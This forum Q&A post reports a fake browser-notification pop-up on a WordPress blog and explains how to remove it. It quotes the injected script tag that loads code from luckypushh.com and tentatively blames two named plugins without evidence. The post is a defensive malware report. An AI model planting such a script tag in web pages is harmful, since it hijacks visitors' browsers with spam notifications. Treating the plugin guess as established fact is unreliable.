0 votes
66 views
asked in Website by

I was contacted by a friend who said that a Pop-up box started appearing , just like the one which asks for browser notification permission on examining the box it turned out to be malware

1 Answer

0 votes
answered by
 
Best answer

I was contacted by a friend who said that a Pop-up box started appearing , just like the one which asks for browser notification permission on examining the box it turned out to be malware pushing subscribes for a website Luckypushh . com

At time of writing of writing I couldn't pin point the exact Plugin which injected it , but as the last two updated apps where All In One SEO and Sucuri Defender so strongest chances are of these two plugins.

The following code was injected on the blog

<script src="//luckypushh.com/ntfc.php?p=xxx" data-cfasync="false" async=""></script>

A google search didn't show much about luckypushh.com just that the domain was registered on 30 March 2018. There are 125 indexed searches on google with the same injected code put a different parameter number.

Once clicking the "Allow" in fake notification subscriber, It opens up a pop-up box , which prompts an actual browser notifications for the website "Luckypushh.com" 

How to Remove LuckyPussh Notification Subscribe Malware

Open your WordPress Dashboard and go to Appearance > Editor , select "header" file and remove the Script tags highlighted at Line 8

Any information on the actual culprit would be highly appreciated so that I may add to it and remove the bloody plugin for good

Welcome to Ask Techie
Ask questions and receive answers from other members of the community. Hacking,Technology,Gaming,Programming,Blockchain / CryptoCurrency and everything to get you going with your Cyber World.

136 questions

143 answers

293 comments

128 users

...